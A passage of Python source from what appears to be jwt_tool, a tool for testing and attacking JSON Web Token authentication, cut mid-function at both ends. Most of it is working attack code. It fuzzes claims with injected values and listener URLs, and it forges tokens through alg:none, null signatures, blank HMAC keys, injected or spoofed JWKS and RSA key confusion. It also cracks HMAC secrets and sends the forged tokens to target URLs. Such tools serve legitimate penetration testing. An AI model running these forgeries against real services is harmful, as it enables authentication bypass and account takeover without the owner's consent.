header claims 1526 | injectEachHeader(None) 1527 | injectEachHeader(True) 1528 | injectEachHeader(False) 1529 | injectEachHeader("jwt_tool") 1530 | injectEachHeader(0) 1531 | # Inject dangerous content-types into existing payload claims 1532 | injectEachPayload(None) 1533 | injectEachPayload(True) 1534 | injectEachPayload(False) 1535 | injectEachPayload("jwt_tool") 1536 | injectEachPayload(0) 1537 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1538 | 1539 | def scanModeCommonClaims(): 1540 | cprintc("\nLAUNCHING SCAN: Common Claim Injection", "magenta") 1541 | # Inject external URLs into common claims 1542 | with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: 1543 | nextHeader = commonHeaders.readline().rstrip() 1544 | while nextHeader: 1545 | injectExternalInteractionHeader(config['services']['httplistener']+"/inject_common_", nextHeader) 1546 | nextHeader = commonHeaders.readline().rstrip() 1547 | with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: 1548 | nextPayload = commonPayloads.readline().rstrip() 1549 | while nextPayload: 1550 | injectExternalInteractionPayload(config['services']['httplistener']+"/inject_common_", nextPayload) 1551 | nextPayload = commonPayloads.readline().rstrip() 1552 | # Inject dangerous content-types into common claims 1553 | injectCommonClaims(None) 1554 | injectCommonClaims(True) 1555 | injectCommonClaims(False) 1556 | injectCommonClaims("jwt_tool") 1557 | injectCommonClaims(0) 1558 | 1559 | cprintc("Scanning mode completed: review the above results.\n", "magenta") 1560 | 1561 | def injectCommonClaims(contentVal): 1562 | with open(config['input']['commonHeaders'], "r", encoding='utf-8', errors='ignore') as commonHeaders: 1563 | nextHeader = commonHeaders.readline().rstrip() 1564 | while nextHeader: 1565 | origVal = "" 1566 | try: 1567 | origVal = headDict[nextHeader] 1568 | except: 1569 | pass 1570 | headDict[nextHeader] = contentVal 1571 | newContents = genContents(headDict, paylDict) 1572 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Header Claim: "+str(nextHeader)) 1573 | if origVal != "": 1574 | headDict[nextHeader] = origVal 1575 | else: 1576 | del headDict[nextHeader] 1577 | nextHeader = commonHeaders.readline().rstrip() 1578 | with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: 1579 | nextPayload = commonPayloads.readline().rstrip() 1580 | while nextPayload: 1581 | 
origVal = "" 1582 | try: 1583 | origVal = paylDict[nextPayload] 1584 | except: 1585 | pass 1586 | paylDict[nextPayload] = contentVal 1587 | newContents = genContents(headDict, paylDict) 1588 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Payload Claim: "+str(nextPayload)) 1589 | if origVal != "": 1590 | paylDict[nextPayload] = origVal 1591 | else: 1592 | del paylDict[nextPayload] 1593 | nextPayload = commonPayloads.readline().rstrip() 1594 | 1595 | def injectEachHeader(contentVal): 1596 | for headerClaim in headDict: 1597 | origVal = headDict[headerClaim] 1598 | headDict[headerClaim] = contentVal 1599 | newContents = genContents(headDict, paylDict) 1600 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Header Claim: "+str(headerClaim)) 1601 | headDict[headerClaim] = origVal 1602 | 1603 | def injectEachPayload(contentVal): 1604 | for payloadClaim in paylDict: 1605 | origVal = paylDict[payloadClaim] 1606 | paylDict[payloadClaim] = contentVal 1607 | newContents = genContents(headDict, paylDict) 1608 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Payload Claim: "+str(payloadClaim)) 1609 | paylDict[payloadClaim] = origVal 1610 | 1611 | def injectExternalInteractionHeader(listenerUrl, headerClaim): 1612 | injectUrl = listenerUrl+headerClaim 1613 | origVal = "" 1614 | try: 1615 | origVal = headDict[headerClaim] 1616 | except: 1617 | pass 1618 | headDict[headerClaim] = injectUrl 1619 | newContents = genContents(headDict, paylDict) 1620 | jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Header Claim: "+str(headerClaim)) 1621 | if origVal != "": 1622 | headDict[headerClaim] = origVal 1623 | else: 1624 | del headDict[headerClaim] 1625 | 1626 | def injectExternalInteractionPayload(listenerUrl, payloadClaim): 1627 | injectUrl = listenerUrl+payloadClaim 1628 | origVal = "" 1629 | try: 1630 | origVal = paylDict[payloadClaim] 1631 | except: 1632 | pass 1633 | paylDict[payloadClaim] = injectUrl 1634 | newContents = genContents(headDict, paylDict) 1635 | jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Payload Claim: "+str(payloadClaim)) 1636 | if origVal != "": 1637 | paylDict[payloadClaim] = origVal 1638 | else: 1639 | del paylDict[payloadClaim] 1640 | 1641 | # def kidInjectAttacks(): 1642 | # with open(config['argvals']['injectionfile'], "r", encoding='utf-8', errors='ignore') as valLst: 1643 | # nextVal = valLst.readline() 1644 | # while nextVal: 1645 | # newheadDict, newHeadB64 = injectheaderclaim(config['argvals']['headerclaim'], nextVal.rstrip()) 1646 | # newContents = genContents(newheadDict, paylDict) 1647 | # jwtOut(newContents+"."+sig, "Injected kid claim", desc) 1648 | # nextVal = valLst.readline() 1649 | 1650 | def reflectedClaims(): 1651 | checkVal = "jwt_inject_"+hashlib.md5(datetime.now().strftime('%Y-%m-%d %H:%M:%S').encode()).hexdigest()+"_" 1652 | for claim in paylDict: 1653 | tmpValue = paylDict[claim] 1654 | paylDict[claim] = checkVal+claim 1655 | tmpContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1656 | jwtOut(tmpContents+"."+sig, "Claim processing check in "+claim+" claim", "Token sent to check if the signature is checked before the "+claim+" claim is processed") 1657 | if checkVal+claim in config['argvals']['rescontent']: 1658 | cprintc("Injected value in "+claim+" claim was observed - "+checkVal+claim, "red") 1659 | 
paylDict[claim] = tmpValue 1660 | 1661 | 1662 | def preScan(): 1663 | cprintc("Running prescan checks...", "cyan") 1664 | jwtOut(jwt, "Prescan: original token", "Prescan: original token") 1665 | if config['argvals']['canaryvalue']: 1666 | if config['argvals']['canaryvalue'] not in config['argvals']['rescontent']: 1667 | cprintc("Canary value ("+config['argvals']['canaryvalue']+") was not found in base request - check that this token is valid and you are still logged in", "red") 1668 | shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") 1669 | if shallWeGoOn == "N": 1670 | exit(1) 1671 | elif shallWeGoOn == "n": 1672 | exit(1) 1673 | origResSize, origResCode = config['argvals']['ressize'], config['argvals']['rescode'] 1674 | jwtOut("null", "Prescan: no token", "Prescan: no token") 1675 | nullResSize, nullResCode = config['argvals']['ressize'], config['argvals']['rescode'] 1676 | if config['argvals']['canaryvalue'] == "": 1677 | if origResCode == nullResCode: 1678 | cprintc("Valid and missing token requests return the same Status Code.\nYou should probably specify something from the page that identifies the user is logged-in (e.g. -cv \"Welcome back, ticarpi!\")", "red") 1679 | shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") 1680 | if shallWeGoOn == "N": 1681 | exit(1) 1682 | elif shallWeGoOn == "n": 1683 | exit(1) 1684 | jwtTweak = contents.decode()+"."+sig[:-4] 1685 | jwtOut(jwtTweak, "Prescan: Broken signature", "This token was sent to check if the signature is being checked") 1686 | jwtOut(jwt, "Prescan: repeat original token", "Prescan: repeat original token") 1687 | if origResCode != config['argvals']['rescode']: 1688 | cprintc("Original token not working after invalid submission. Testing will need to be done manually, re-authenticating after each invalid submission", "red") 1689 | exit(1) 1690 | 1691 | 1692 | def runScanning(): 1693 | cprintc("Running Scanning Module:", "cyan") 1694 | preScan() 1695 | if config['argvals']['scanMode'] == "pb": 1696 | scanModePlaybook() 1697 | if config['argvals']['scanMode'] == "er": 1698 | scanModeErrors() 1699 | if config['argvals']['scanMode'] == "cc": 1700 | scanModeCommonClaims() 1701 | if config['argvals']['scanMode'] == "at": 1702 | scanModePlaybook() 1703 | scanModeErrors() 1704 | scanModeCommonClaims() 1705 | 1706 | 1707 | def runExploits(): 1708 | if args.exploit: 1709 | if args.exploit == "a": 1710 | noneToks = checkAlgNone(headDict, paylB64) 1711 | zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) 1712 | for noneTok in zippedToks: 1713 | desc = "EXPLOIT: "+zippedToks[noneTok]+" - this is an exploit targeting the debug feature that allows a token to have no signature\n(This will only be valid on unpatched implementations of JWT.)" 1714 | jwtOut(noneTok, "Exploit: "+zippedToks[noneTok], desc) 1715 | # exit(1) 1716 | elif args.exploit == "n": 1717 | jwtNull = checkNullSig(contents) 1718 | desc = "EXPLOIT: null signature\n(This will only be valid on unpatched implementations of JWT.)" 1719 | jwtOut(jwtNull, "Exploit: Null signature", desc) 1720 | # exit(1) 1721 | elif args.exploit == "b": 1722 | key = "" 1723 | newSig, newContents = signTokenHS(headDict, paylDict, key, 256) 1724 | jwtBlankPw = newContents+"."+newSig 1725 | desc = "EXPLOIT: Blank password accepted in signature\n(This will only be valid on unpatched implementations of JWT.)" 1726 | jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature", desc) 1727 | # exit(1) 
1728 | elif args.exploit == "i": 1729 | newSig, newContents = jwksEmbed(headDict, paylDict) 1730 | desc = "EXPLOIT: injected JWKS\n(This will only be valid on unpatched implementations of JWT.)" 1731 | jwtOut(newContents+"."+newSig, "Injected JWKS", desc) 1732 | # exit(1) 1733 | elif args.exploit == "s": 1734 | if config['services']['jwksloc']: 1735 | jku = config['services']['jwksloc'] 1736 | newContents, newSig = exportJWKS(jku) 1737 | if config['services']['jwksloc'] == args.jwksurl: 1738 | cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks'])+"", "cyan") 1739 | desc = "Signed with JWKS at "+config['services']['jwksloc'] 1740 | jwtOut(newContents+"."+newSig, "Spoof JWKS", desc) 1741 | # exit(1) 1742 | else: 1743 | cprintc("No URL provided to spoof the JWKS (-u)\n", "red") 1744 | parser.print_usage() 1745 | # exit(1) 1746 | elif args.exploit == "k": 1747 | if config['crypto']['pubkey']: 1748 | newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) 1749 | desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)" 1750 | jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc) 1751 | else: 1752 | cprintc("No Public Key provided (-pk)\n", "red") 1753 | parser.print_usage() 1754 | # exit(1) 1755 | 1756 | def runActions(): 1757 | if args.tamper: 1758 | tamperToken(paylDict, headDict, sig) 1759 | exit(1) 1760 | if args.verify: 1761 | if args.pubkey: 1762 | algType = headDict["alg"][0:2] 1763 | if algType == "RS": 1764 | if args.pubkey: 1765 | verifyTokenRSA(headDict, paylDict, sig, args.pubkey) 1766 | else: 1767 | verifyTokenRSA(headDict, paylDict, sig, config['crypto']['pubkey']) 1768 | exit(1) 1769 | elif algType == "ES": 1770 | if config['crypto']['pubkey']: 1771 | verifyTokenEC(headDict, paylDict, sig, config['crypto']['pubkey']) 1772 | else: 1773 | cprintc("No Public Key provided (-pk)\n", "red") 1774 | parser.print_usage() 1775 | exit(1) 1776 | elif algType == "PS": 1777 | if config['crypto']['pubkey']: 1778 | verifyTokenPSS(headDict, paylDict, sig, config['crypto']['pubkey']) 1779 | else: 1780 | cprintc("No Public Key provided (-pk)\n", "red") 1781 | parser.print_usage() 1782 | exit(1) 1783 | else: 1784 | cprintc("Algorithm not supported for verification", "red") 1785 | exit(1) 1786 | elif args.jwksfile: 1787 | parseJWKS(config['crypto']['jwks']) 1788 | else: 1789 | cprintc("No Public Key or JWKS file provided (-pk/-jw)\n", "red") 1790 | parser.print_usage() 1791 | exit(1) 1792 | runExploits() 1793 | if args.crack: 1794 | if args.password: 1795 | cprintc("Password provided, checking if valid...", "cyan") 1796 | checkSig(sig, contents, config['argvals']['key']) 1797 | elif args.dict: 1798 | crackSig(sig, contents) 1799 | elif args.keyfile: 1800 | checkSigKid(sig, contents) 1801 | else: 1802 | cprintc("No cracking option supplied:\nPlease specify a password/dictionary/Public Key\n", "red") 1803 | parser.print_usage() 1804 | exit(1) 1805 | if args.query and config['argvals']['sigType'] != "": 1806 | signingToken(headDict, paylDict) 1807 | 1808 | def printLogo(): 1809 | print() 1810 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m 
\x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ ") 1811 | print(" \__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1812 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1813 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1814 | print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m _\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1815 | print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1816 | print("\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m 
\x1b[0m\x1b[48;5;24m \x1b[0m |") 1817 | print(" \______/ \__/ \__| \__|\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\__| \______/ \______/ \__|") 1818 | print(" \x1b[36mVersion "+jwttoolvers+" \x1b[0m \______| \x1b[36m@ticarpi\x1b[0m ") 1819 | print() 1820 | 1821 | if __name__ == '__main__': 1822 | parser = argparse.ArgumentParser(epilog="If you don't have a token, try this one:\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po", formatter_class=argparse.RawTextHelpFormatter) 1823 | parser.add_argument("jwt", nargs='?', type=str, 1824 | help="the JWT to tinker with (no need to specify if in header/cookies)") 1825 | parser.add_argument("-b", "--bare", action="store_true", 1826 | help="return TOKENS ONLY") 1827 | parser.add_argument("-t", "--targeturl", action="store", 1828 | help="URL to send HTTP request to with new JWT") 1829 | parser.add_argument("-rc", "--cookies", action="store", 1830 | help="request cookies to send with the forged HTTP request") 1831 | parser.add_argument("-rh", "--headers", action="append", 1832 | help="request headers to send with the forged HTTP request (can be used multiple times for additional headers)") 1833 | parser.add_argument("-pd", "--postdata", action="store", 1834 | help="text string that contains all the data to be sent in a POST request") 1835 | parser.add_argument("-cv", "--canaryvalue", action="store", 1836 | help="text string that appears in response for valid token (e.g. \"Welcome, ticarpi\")") 1837 | parser.add_argument("-np", "--noproxy", action="store_true", 1838 | help="disable proxy for current request (change in jwtconf.ini if permanent)") 1839 | parser.add_argument("-M", "--mode", action="store", 1840 | help="Scanning mode:\npb = playbook audit\ner = fuzz existing claims to force errors\ncc = fuzz common claims\nat - All Tests!") 1841 | parser.add_argument("-X", "--exploit", action="store", 1842 | help="eXploit known vulnerabilities:\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS") 1843 | parser.add_argument("-ju", "--jwksurl", action="store", 1844 | help="URL location where you can host a spoofed JWKS") 1845 | parser.add_argument("-S", "--sign", action="store", 1846 | help="sign the resulting token:\nhs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)\nrs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)\nes256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)\nps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)") 1847 | parser.add_argument("-pr", "--privkey", action="store", 1848 | help="Private Key for Asymmetric crypto") 1849 | parser.add_argument("-T", "--tamper", action="store_true", 1850 | help="tamper with the JWT contents\n(set signing options with -S or use exploits with -X)") 1851 | parser.add_argument("-I", "--injectclaims", action="store_true", 1852 | help="inject new claims and update existing claims with new values\n(set signing options with -S or use exploits with -X)\n(set target claim with -hc/-pc and injection values/lists with -hv/-pv") 1853 | parser.add_argument("-hc", "--headerclaim", action="append", 1854 | help="Header claim to tamper with") 1855 | parser.add_argument("-pc", "--payloadclaim", action="append", 1856 
| help="Payload claim to tamper with") 1857 | parser.add_argument("-hv", "--headervalue", action="append", 1858 | help="Value (or file containing values) to inject into tampered header claim") 1859 | parser.add_argument("-pv", "--payloadvalue", action="append", 1860 | help="Value (or file containing values) to inject into tampered payload claim") 1861 | parser.add_argument("-C", "--crack", action="store_true", 1862 | help="crack key for an HMAC-SHA token\n(specify -d/-p/-kf)") 1863 | parser.add_argument("-d", "--dict", action="store", 1864 | help="dictionary file for cracking") 1865 | parser.add_argument("-p", "--password", action="store", 1866 | help="password for cracking") 1867 | parser.add_argument("-kf", "--keyfile", action="store", 1868 | help="keyfile for cracking (when signed with 'kid' attacks)") 1869 | parser.add_argument("-V", "--verify", action="store_true", 1870 | help="verify the RSA signature against a Public Key\n(specify -pk/-jw)") 1871 | parser.add_argument("-pk", "--pubkey", action="store", 1872 | help="Public Key for Asymmetric crypto") 1873 | parser.add_argument("-jw", "--jwksfile", action="store", 1874 | help="JSON Web Key Store for Asymmetric crypto") 1875 | parser.add_argument("-Q", "--query", action="store", 1876 | help="Query a token ID against the logfile to see the details of that request\ne.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a") 1877 | parser.add_argument("-v", "--verbose", action="store_true", 1878 | help="When parsing and printing, produce (slightly more) verbose output.") 1879 | args = parser.parse_args() 1880 | if not args.bare: 1881 | printLogo() 1882 | path = sys.path[0] 1883 | logFilename = path+"/logs.txt" 1884 | configFileName = path+"/jwtconf.ini" 1885 | config = configparser.ConfigParser() 1886 | if (os.path.isfile(configFileName)): 1887 | config.read(configFileName) 1888 | else: 1889 | cprintc("No config file yet created.\nRunning config setup.", "cyan") 1890 | createConfig() 1891 | if config['services']['jwt_tool_version'] != jwttoolvers: 1892 | cprintc("Config file showing wrong version ("+config['services']['jwt_tool_version']+" vs "+jwttoolvers+")", "red") 1893 | cprintc("Current config file has been backed up as '"+path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini' and a new config generated.\nPlease review and manually transfer any custom options you have set.", "red") 1894 | os.rename(configFileName, path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini") 1895 | createConfig() 1896 | exit(1) 1897 | with open('null.txt', 'w') as nullfile: 1898 | pass 1899 | findJWT = "" 1900 | if args.targeturl: 1901 | if args.cookies or args.headers or args.postdata: 1902 | jwt_count = 0 1903 | jwt_locations = [] 1904 | 1905 | if args.cookies and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): 1906 | jwt_count += 1 1907 | jwt_locations.append("cookie") 1908 | 1909 | if args.headers and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): 1910 | jwt_count += 1 1911 | jwt_locations.append("headers") 1912 | 1913 | if args.postdata and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): 1914 | jwt_count += 1 1915 | jwt_locations.append("post data") 1916 | 1917 | if jwt_count > 1: 1918 | cprintc("Too many tokens! 
JWT in more than one place: cookie, header, POST data", "red") 1919 | exit(1) 1920 | 1921 | if args.cookies: 1922 | try: 1923 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): 1924 | config['argvals']['headerloc'] = "cookies" 1925 | except: 1926 | cprintc("Invalid cookie formatting", "red") 1927 | exit(1) 1928 | 1929 | if args.headers: 1930 | try: 1931 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): 1932 | config['argvals']['headerloc'] = "headers" 1933 | except: 1934 | cprintc("Invalid header formatting", "red") 1935 | exit(1) 1936 | 1937 | if args.postdata: 1938 | try: 1939 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): 1940 | config['argvals']['headerloc'] = "postdata" 1941 | except: 1942 | cprintc("Invalid postdata formatting", "red") 1943 | exit(1) 1944 | 1945 | searchString = " | ".join([ 1946 | str(args.cookies), 1947 | str(args.headers), 1948 | str(args.postdata) 1949 | ]) 1950 | 1951 | try: 1952 | findJWT = re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', searchString)[0] 1953 | except: 1954 | cprintc("Cannot find a valid JWT", "red") 1955 | cprintc(searchString, "cyan") 1956 | exit(1) 1957 | if args.query: 1958 | jwt = searchLog(args.query) 1959 | elif args.jwt: 1960 | jwt = args.jwt 1961 | cprintc("Original JWT: "+findJWT+"\n", "cyan") 1962 | elif findJWT: 1963 | jwt = findJWT 1964 | cprintc("Original JWT: "+findJWT+"\n", "cyan") 1965 | else: 1966 | parser.print_usage() 1967 | cprintc("No JWT provided", "red") 1968 | exit(1) 1969 | if args.mode: 1970 | if args.mode not in ['pb','er', 'cc', 'at']: 1971 | parser.print_usage() 1972 | cprintc("\nPlease choose a scanning mode (e.g. -M pb):\npb = playbook\ner = force errors\ncc = fuzz common claims\nat = all tests", "red") 1973 | exit(1) 1974 | else: 1975 | config['argvals']['scanMode'] = args.mode 1976 | if args.exploit: 1977 | if args.exploit not in ['a', 'n', 'b', 's', 'i', 'k']: 1978 | parser.print_usage() 1979 | cprintc("\nPlease choose an exploit (e.g. -X a):\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS", "red") 1980 | exit(1) 1981 | else: 1982 | config['argvals']['exploitType'] = args.exploit 1983 | if args.sign: 1984 | if args.sign not in ['hs256','hs384','hs512','rs256','rs384','rs512','es256','es384','es512','ps256','ps384','ps512']: 1985 | parser.print_usage() 1986 | cprintc("\nPlease choose a signature option (e.g. 
-S hs256)", "red") 1987 | exit(1) 1988 | else: 1989 | config['argvals']['sigType'] = args.sign 1990 | headDict, paylDict, sig, contents = validateToken(jwt) 1991 | paylB64 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1992 | config['argvals']['overridesub'] = "false" 1993 | if args.targeturl: 1994 | config['argvals']['targetUrl'] = args.targeturl.replace('%','%%') 1995 | if args.cookies: 1996 | config['argvals']['cookies'] = args.cookies 1997 | if args.headers: 1998 | config['argvals']['header'] = str(args.headers) 1999 | if args.dict: 2000 | config['argvals']['keyList'] = args.dict 2001 | if args.keyfile: 2002 | config['argvals']['keyFile'] = args.keyfile 2003 | if args.password: 2004 | config['argvals']['key'] = args.password 2005 | if args.pubkey: 2006 | config['crypto']['pubkey'] = args.pubkey 2007 | if args.privkey: 2008 | config['crypto']['privkey'] = args.privkey 2009 | if args.jwksfile: 2010 | config['crypto']['jwks'] = args.jwksfile 2011 | if args.jwksurl: 2012 | config['services']['jwksloc'] = args.jwksurl 2013 | if args.payloadclaim: 2014 | config['argvals']['payloadclaim'] = str(args.payloadclaim) 2015 | if args.headerclaim: 2016 | config['argvals']['headerclaim'] = str(args.headerclaim) 2017 | if args.payloadvalue: 2018 | config['argvals']['payloadvalue'] = str(args.payloadvalue) 2019 | if args.headervalue: 2020 | config['argvals']['headervalue'] = str(args.headervalue) 2021 | if args.postdata: 2022 | config['argvals']['postData'] = args.postdata 2023 | if args.canaryvalue: 2024 | config['argvals']['canaryvalue'] = args.canaryvalue 2025 | if args.noproxy: 2026 | config['services']['proxy'] = "False" 2027 | if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.injectclaims: 